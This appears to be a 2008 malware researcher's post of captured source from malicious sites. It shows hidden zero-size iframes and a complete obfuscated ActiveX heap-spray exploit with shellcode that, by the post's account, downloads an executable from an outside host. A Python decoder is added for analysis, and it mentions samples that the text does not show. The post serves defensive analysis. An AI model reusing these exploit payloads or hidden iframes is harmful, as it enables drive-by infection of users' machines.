Source code for: http://www.letusearch.com/xiaoke.htm
Server IP: 74.52.24.59 [ mail.wtowww.com ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:10:10:10
*****************************************************************
<iframe src=http://www.letusearch.com/search/d.php?aff=xiaoke width=0 height=0></iframe>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.onegameplace.com/xiaoke.htm
Server IP: 65.110.63.170 [ 65-110-63-170.static.sagonet.net ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:11:24:11
*****************************************************************

<HTML>
<HEAD><TITLE>OneGameplace</TITLE>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
</HEAD>
<BODY>
<iframe src=http://www.7scv.com/search/portal.php?username=xiaoke width='0' height='0' frameborder='0'></iframe>
<A href="http://www.51-search.com/search.php?query=Free+Games" target=_blank>Free Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Flash+Games" target=_blank>Flash Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Arcade+Games" target=_blank>Arcade Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Play+Online" target=_blank>Play Online</A> </LI></UL>
<H3><A
href="http://www.51-search.com/search.php?query=Free+Online+Games" target=_blank>Free Online Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Addicting+Games" target=_blank>Addicting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Free+Fun" target=_blank>Free Fun</A>
<LI><A href="http://www.51-search.com/search.php?query=Sports+Games" target=_blank>Sports Games</A> </LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Action+Games" target=_blank>Action Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Adventure+Games" target=_blank>Adventure Games</A>

<LI><A href="http://www.51-search.com/search.php?query=Puzzle+Games" target=_blank>Puzzle Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Skills+Games" target=_blank>Skills Games</A>
</LI></UL>
<H3><A href="http://www.51-search.com/search.php?query=Shooting+Games" target=_blank>Shooting Games</A></H3>
<UL>
<LI><A href="http://www.51-search.com/search.php?query=Fighting+Games" target=_blank>Fighting Games</A>
<LI><A href="http://www.51-search.com/search.php?query=Work+at+Home" target=_blank>Work at Home</A>
<LI><A href="http://www.51-search.com/search.php?query=RPG+Games" target=_blank>RPG Games</A> </LI></UL></DIV><!-- dir left end --><!-- dir mid box -->

<DIV id=FT>© 2007-2008 OneGamePlace
</DIV>
</DIV><!-- footer end --></DIV></DIV></DIV></DIV><!-- main container end -->
<table border = "0">
<tr>

<td>

</td>


</tr>
</table>
<div id="eXTReMe"><a href="http://extremetracking.com/open?login=kkology">
<img src="http://t1.extreme-dm.com/i.gif" style="border: 0;"
height="38" width="41" id="EXim" alt="eXTReMe Tracker" /></a>
<script type="text/javascript"><!--
var EXlogin='kkology' // Login
var EXvsrv='s11' // VServer
EXs=screen;EXw=EXs.width;navigator.appName!="Netscape"?
EXb=EXs.colorDepth:EXb=EXs.pixelDepth;
navigator.javaEnabled()==1?EXjv="y":EXjv="n";
EXd=document;EXw?"":EXw="na";EXb?"":EXb="na";
EXd.write("<img src=http://e2.extreme-dm.com",
"/"+EXvsrv+".g?login="+EXlogin+"&",
"jv="+EXjv+"&j=y&srw="+EXw+"&srb="+EXb+"&",
"l="+escape(EXd.referrer)+" height=1 width=1>");//-->
</script><noscript><div id="neXTReMe"><img height="1" width="1" alt=""
src="http://e2.extreme-dm.com/s11.g?login=kkology&j=n&jv=n" />
</div></noscript></div>
<script language="javascript" type="text/javascript">

window.status="Done"

</script>
</body>
</html>


*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www.kkexe.com/key.htm
Server IP: 125.91.13.147 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:13:35:13
*****************************************************************
<iframe src="http://www.bbcseek.com/seo.php?ref=itxiaoke" width="780" height="700" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>


http://www0.douhunqn.cn/csrss/real11.htm

This is detected as HTML/Shellcode.Gen and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/real11.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:18:26:18
*****************************************************************
<SCRIPT language="javascript">
Hello="Hi";
var tcsafeobj="o"+"b"+"j"+"e"+"c"+"t";
tcsafe=document.createElement(tcsafeobj);
var tcsafeid="clsid:2F542A2E-EDC9-4B";
var tcsafeids="F7-8CB1-87C9919F7F93";
var tcsafeidx=tcsafeid+tcsafeids;
tcsafe["setAttribute"]("classid", tcsafeidx);
var tcsafe_ulr="%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000";
var yt1="%uffff%ua164%u0030%u0000%u408b";
var yt2="%u6856%u4e8e%uec0e%ua3e8%u0000";
var yt3="%u8900%u1445%ue0bb%u020f%u8900";
var yt4="%u0544%u652c%u0000%u5600%u8d56";
var yt5="%u0320%u33f3%u49c9%uad41%uc303";
var yt6="%u5e00%u80bf%u020c%ub900%u0100";
var yt7="%u0c47%u6165%u0070%u5057%u55ff";
var yt8="%u1055%u06c7%u0c80%u0002%uc481";
var tcsafecode = window["unescape"]("%u90"+"90"+"%u90"+"90"+"%u90"+"90"+
"%u6090"+"%u17eb%u645e%u30a1"+"%u0000%u0500%u0800%u0000%uf88b"+"%u00b9"+
"%u0004"+"%uf300%uffa4%ue8e0%uffe4"+yt1+"%u8b0c"+
"%u1c70"+"%u8bad%u0870%uec81%u0200"+"%u0000%uec8b%ue8bb%u020f%u8b00"+"%u8503"+
"%u0fc0"+"%ubb85%u0000%uff00%ue903"+"%u0221%u0000%u895b%u205d%u6856"+"%ufe98"+
"%u0e8a"+"%ub1e8%u0000%u8900%u0c45"+yt2+"%u8900"+
"%u0445"+"%u6856%u79c1%ub8e5%u95e8"+"%u0000%u8900%u1c45%u6856%uc61b"+"%u7946"+
"%u87e8"+"%u0000%u8900%u1045%u6856"+"%ufcaa%u7c0d%u79e8%u0000%u8900"+"%u0845"+
"%u6856"+"%u84e7%ub469%u6be8%u0000"+yt3+"%u3303"+
"%uc7f6"+"%u2845%u5255%u4d4c%u45c7"+"%u4f2c%u004e%u8d00%u285d%uff53"+"%u0455"+
"%u6850"+"%u1a36%u702f%u3fe8%u0000"+"%u8900%u2445%u7f6a%u5d8d%u5328"+"%u55ff"+
"%uc71c"+"%u0544%u5c28%u652e%uc778"+yt4+"%u287d"+
"%uff57"+"%u2075%uff56%u2455%u5756"+"%u55ff%ue80c%u0062%u0000%uc481"+"%u0200"+
"%u0000"+"%u3361%uc2c0%u0004%u8b55"+"%u51ec%u8b53%u087d%u5d8b%u560c"+"%u738b"+
"%u8b3c"+"%u1e74%u0378%u56f3%u768b"+yt5+"%u3356"+
"%u0ff6"+"%u10be%uf23a%u0874%ucec1"+"%u030d%u40f2%uf1eb%ufe3b%u755e"+"%u5ae5"+
"%ueb8b"+"%u5a8b%u0324%u66dd%u0c8b"+"%u8b4b%u1c5a%udd03%u048b%u038b"+"%u5ec5"+
"%u595b"+"%uc25d%u0008%u92e9%u0000"+yt6+"%u0000"+
"%ua4f3"+"%uec81%u0100%u0000%ufc8b"+"%uc783%uc710%u6e07%u6474%uc76c"+"%u0447"+
"%u006c"+"%u0000%uff57%u0455%u4589"+"%uc724%u5207%u6c74%uc741%u0447"+"%u6c6c"+
"%u636f"+"%u47c7%u6108%u6574%uc748"+yt7+"%u8b08"+
"%ub8f0"+"%u0fe4%u0002%u3089%u07c7"+"%u736d%u6376%u47c7%u7204%u0074"+"%u5700"+
"%u55ff"+"%u8b04%u3c48%u8c8b%u8008"+"%u0000%u3900%u0834%u0474%uf9e2"+"%u12eb"+
"%u348d"+"%u5508%u406a%u046a%uff56"+yt8+"%u0100"+
"%u0000"+"%ue8c3%uff69%uffff%u048b"+"%u5324%u5251%u5756%uecb9%u020f"+"%u8b00"+
"%u8519"+"%u75db%u3350%u33c9%u83db"+"%u06e8%ub70f%u8118%ufffb%u0015"+"%u7500"+
"%u833e"+"%u06e8%ub70f%u8118%ufffb"+"%u0035%u7500%u8330%u02e8%ub70f"+"%u8318"+
"%u6afb"+"%u2575%uc083%u8b04%ub830"+"%u0fe0%u0002%u0068%u0000%u6801"+"%u1000"+
"%u0000"+"%u006a%u10ff%u0689%u4489"+"%u1824%uecb9%u020f%uff00%u5f01"+"%u5a5e"+
"%u5b59"+"%ue4b8%u020f%uff00%ue820"+"%ufdda%uffff"+tcsafe_ulr);

var bigblock = unescape("%u0C0C" + "%u0C0C");
var headersize = 20;
var slackspace = headersize + tcsafecode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock["substring"](0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new window["Array"]();
var tcsafes = memory;
for (i = 0; i < 400; i++)
{
tcsafes[i] = block + tcsafecode
}

var buf = '';
while (buf.length < 32) buf = buf + unescape("%0C");

var m = '';

m = tcsafe.Console;
tcsafe.Console = buf;
tcsafe.Console = m;

m = tcsafe.Console;
tcsafe.Console = buf;
tcsafe.Console = m;
</script>


Once again, this downloads rondll32.exe.
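What Malzilla does with the %u escaped code in net.htm and real11.htm can be reproduced in a few lines, and it is worth seeing why the bytes in those strings look swapped. The following is an added example (my code, not from the post and not Malzilla) that decodes JavaScript %uXXXX and %XX escapes into the bytes unescape() would leave in memory, pulls printable strings out of the result and measures how much of it is sled filler. The tcsafe_ulr literal and the opening of the tcsafecode string are copied from real11.htm above; the spray sled literal is the one both pages use. Nothing here executes anything, it only inspects the strings.

```python
"""Decode JavaScript %uXXXX / %XX escapes into raw bytes and inspect them.

Added example for the net.htm and real11.htm samples in the post above; not
code from the post. The %u literals below are copied from real11.htm.
"""
import re

ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape_bytes(s: str) -> bytes:
    """Reproduce what JavaScript's unescape() builds in memory.

    Each %uXXXX is one UTF-16 code unit, stored little-endian, which is why
    shellcode authors write the bytes swapped (%u7468 -> 'h','t'). A bare %XX
    is the code unit 0x00XX, so it occupies two bytes. Other characters pass
    through as UTF-16LE as well.
    """
    out = bytearray()
    pos = 0
    for m in ESC_RE.finditer(s):
        out += s[pos:m.start()].encode("utf-16-le")
        if m.group(1):
            out += bytes.fromhex(m.group(1))[::-1]   # swap to little-endian
        else:
            out += bytes([int(m.group(2), 16), 0])
        pos = m.end()
    out += s[pos:].encode("utf-16-le")
    return bytes(out)


def printable_strings(data: bytes, min_len: int = 6):
    """Return runs of printable ASCII at least min_len bytes long (like `strings`)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def nop_sled_ratio(data: bytes) -> float:
    """Fraction of bytes that are 0x90 (NOP) or 0x0c (the spray fill used above)."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in (0x90, 0x0c)) / len(data)


def analyse(escaped: str, min_len: int = 6) -> dict:
    """Decode an escaped literal and summarise what an analyst wants to know."""
    data = js_unescape_bytes(escaped)
    return {"length": len(data),
            "strings": printable_strings(data, min_len),
            "sled_ratio": nop_sled_ratio(data)}


# tcsafe_ulr from real11.htm (the download URL is carried in the shellcode)
TCSAFE_ULR = ("%u7468%u7074%u2F3A%u772F%u7777%u702E%u6570%u6578%u632E%u6D6F"
              "%u632F%u7273%u7373%u722F%u6E6F%u6C64%u336C%u2E32%u7865%u0065%u0000")
# the first literals of tcsafecode from real11.htm, concatenated
SHELLCODE_HEAD = "%u9090%u9090%u9090%u6090%u17eb%u645e%u30a1"
# the spray block both pages build with unescape()
SPRAY_SLED = "%u0C0C%u0C0C"

if __name__ == "__main__":
    for name, lit in (("tcsafe_ulr", TCSAFE_ULR), ("tcsafecode head", SHELLCODE_HEAD),
                      ("spray sled", SPRAY_SLED)):
        info = analyse(lit)
        print(f"{name}: {info['length']} bytes, sled ratio {info['sled_ratio']:.2f}, "
              f"strings {info['strings']}")
```

Running it on tcsafe_ulr gives back the same ppexe.com URL that 06014.htm and ff.htm fetch in the clear, which is the quickest way to confirm that all of the stages in this kit lead to the one executable; the high sled ratio on the other two literals is the tell-tale of heap-spray filler rather than data.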

http://www0.douhunqn.cn/csrss/lzx.htm
http://www0.douhunqn.cn/csrss/real10.htm
http://www0.douhunqn.cn/csrss/Bfyy.htm


All three of these seem to return what looks like a 404, but I can't read a bleedin' word, so I'm not 100% sure;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/Bfyy.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 16 September 2008
Time: 03:21:39:21
*****************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
BODY { font: 9pt/12pt 宋体 }
H1 { font: 12pt/15pt 宋体 }
H2 { font: 9pt/12pt 宋体 }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作：</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息（为技术支持人员提供）</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li>
<li>打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li>
</ul>

</TD></TR></TABLE></BODY></HTML>